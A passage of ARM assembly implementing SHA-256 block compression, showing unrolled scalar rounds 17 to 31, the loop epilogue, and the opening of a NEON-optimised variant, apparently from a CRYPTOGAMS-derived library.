and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#2*4] @ 17
@ ldr r1,[sp,#15*4]
mov r0,r2,ror#7
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#1*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#10*4]
add r3,r3,r0
eor r0,r7,r7,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r7,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#1*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 17==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 17<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#3*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#0*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#3*4] @ 18
@ ldr r1,[sp,#0*4]
mov r0,r2,ror#7
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#2*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#11*4]
add r12,r12,r0
eor r0,r6,r6,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r6,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#2*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 18==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 18<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#4*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#1*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#4*4] @ 19
@ ldr r1,[sp,#1*4]
mov r0,r2,ror#7
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#3*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#12*4]
add r3,r3,r0
eor r0,r5,r5,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r5,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#3*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 19==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 19<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#5*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#2*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#5*4] @ 20
@ ldr r1,[sp,#2*4]
mov r0,r2,ror#7
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#4*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#13*4]
add r12,r12,r0
eor r0,r4,r4,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r4,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#4*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 20==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 20<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#6*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#3*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#6*4] @ 21
@ ldr r1,[sp,#3*4]
mov r0,r2,ror#7
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#5*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#14*4]
add r3,r3,r0
eor r0,r11,r11,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r11,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#5*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 21==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 21<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#7*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#4*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#7*4] @ 22
@ ldr r1,[sp,#4*4]
mov r0,r2,ror#7
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#6*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#15*4]
add r12,r12,r0
eor r0,r10,r10,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r10,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#6*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 22==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 22<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#8*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#5*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#8*4] @ 23
@ ldr r1,[sp,#5*4]
mov r0,r2,ror#7
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#7*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#0*4]
add r3,r3,r0
eor r0,r9,r9,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r9,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#7*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 23==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 23<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#9*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#6*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#9*4] @ 24
@ ldr r1,[sp,#6*4]
mov r0,r2,ror#7
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#8*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#1*4]
add r12,r12,r0
eor r0,r8,r8,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r8,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#8*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 24==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 24<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#10*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#7*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#10*4] @ 25
@ ldr r1,[sp,#7*4]
mov r0,r2,ror#7
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#9*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#2*4]
add r3,r3,r0
eor r0,r7,r7,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r7,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#9*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 25==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 25<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#11*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#8*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#11*4] @ 26
@ ldr r1,[sp,#8*4]
mov r0,r2,ror#7
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#10*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#3*4]
add r12,r12,r0
eor r0,r6,r6,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r6,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#10*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 26==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 26<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#12*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#9*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#12*4] @ 27
@ ldr r1,[sp,#9*4]
mov r0,r2,ror#7
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#11*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#4*4]
add r3,r3,r0
eor r0,r5,r5,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r5,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#11*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 27==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 27<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#13*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#10*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#13*4] @ 28
@ ldr r1,[sp,#10*4]
mov r0,r2,ror#7
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#12*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#5*4]
add r12,r12,r0
eor r0,r4,r4,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r4,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#12*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 28==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 28<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#14*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#11*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#14*4] @ 29
@ ldr r1,[sp,#11*4]
mov r0,r2,ror#7
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#13*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#6*4]
add r3,r3,r0
eor r0,r11,r11,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r11,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#13*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 29==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 29<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#15*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#12*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#15*4] @ 30
@ ldr r1,[sp,#12*4]
mov r0,r2,ror#7
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#14*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#7*4]
add r12,r12,r0
eor r0,r10,r10,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r10,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#14*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 30==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 30<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#0*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#13*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#0*4] @ 31
@ ldr r1,[sp,#13*4]
mov r0,r2,ror#7
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#15*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#8*4]
add r3,r3,r0
eor r0,r9,r9,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r9,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#15*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 31==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 31<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#1*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#14*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
#ifdef __thumb2__
ite eq @ Thumb2 thing, sanity check in ARM
#endif
ldreq r3,[sp,#16*4] @ pull ctx
bne .Lrounds_16_xx
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
ldr r0,[r3,#0]
ldr r2,[r3,#4]
ldr r12,[r3,#8]
add r4,r4,r0
ldr r0,[r3,#12]
add r5,r5,r2
ldr r2,[r3,#16]
add r6,r6,r12
ldr r12,[r3,#20]
add r7,r7,r0
ldr r0,[r3,#24]
add r8,r8,r2
ldr r2,[r3,#28]
add r9,r9,r12
ldr r1,[sp,#17*4] @ pull inp
ldr r12,[sp,#18*4] @ pull inp+len
add r10,r10,r0
add r11,r11,r2
stmia r3,{r4,r5,r6,r7,r8,r9,r10,r11}
cmp r1,r12
sub r14,r14,#256 @ rewind Ktbl
bne .Loop
add sp,sp,#19*4 @ destroy frame
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_sha256_block_data_order,.-cryptogams_sha256_block_data_order
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.globl cryptogams_sha256_block_data_order_neon
.type cryptogams_sha256_block_data_order_neon,%function
.align 5
.skip 16
cryptogams_sha256_block_data_order_neon:
stmdb sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
sub r11,sp,#16*4+16
adr r14,K256
bic r11,r11,#15 @ align for 128-bit stores
mov r12,sp
mov sp,r11 @ alloca
add r2,r1,r2,lsl#6 @ len to point at the end of inp
vld1.8 {q0},[r1]!
vld1.8 {q1},[r1]!
vld1.8 {q2},[r1]!
vld1.8 {q3},[r1]!
vld1.32 {q8},[r14,:128]!
vld1.32 {q9},[r14,:128]!
vld1.32 {q10},[r14,:128]!
vld1.32 {q11},[r14,:128]!
vrev32.8 q0,q0 @ yes, even on
str r0,[sp,#64]
vrev32.8 q1,q1 @ big-endian
str r1,[sp,#68]
mov r1,sp
vrev32.8 q2,q2
str r2,[sp,#72]
vrev32.8 q3,q3
str r12,[sp,#76] @ save original sp
vadd.i32 q8,q8,q0
vadd.i32 q9,q9,q1
vst1.32 {q8},[r1,:128]!
vadd.i32 q10,q10,q2
vst1.32 {q9},[r1,:128]!
vadd.i32 q11,q11,q3
vst1.32 {q10},[r1,:128]!
vst1.32 {q11},[r1,:128]!
ldmia r0,{r4,r5,r6,r7,r8,r9,r10,r11}
sub r1,r1,#64
ldr r2,[sp,#0]
eor r12,r12,r12
eor r3,r5,r6
b .L_00_48
.align 4
.L_00_48:
vext.8 q8,q0,q1,#4
add r11,r11,r2
eor r2,r9,r10
eor r0,r8,r8,ror#5
vext.8 q9,q2,q3,#4
add r4,r4,r12
and r2,r2,r8
eor r12,r0,r8,ror#19
vshr.u32 q10,q8,#7
eor r0,r4,r4,ror#11
eor r2,r2,r10
vadd.i32 q0,q0,q9
add r11,r11,r12,ror#6
eor r12,r4,r5
vshr.u32 q9,q8,#3
eor r0,r0,r4,ror#20
add r11,r11,r2
vsli.32 q10,q8,#25
ldr r2,[sp,#4]
and r3,r3,r12
vshr.u32 q11,q8,#18
add r7,r7,r11
add r11,r11,r0,ror#2
eor r3,r3,r5
veor q9,q9,q10
add r10,r10,r2
vsli.32 q11,q8,#14
eor r2,r8,r9
eor r0,r7,r7,ror#5
vshr.u32 d24,d7,#17
add r11,r11,r3
and r2,r2,r7
veor q9,q9,q11
eor r3,r0,r7,ror#19
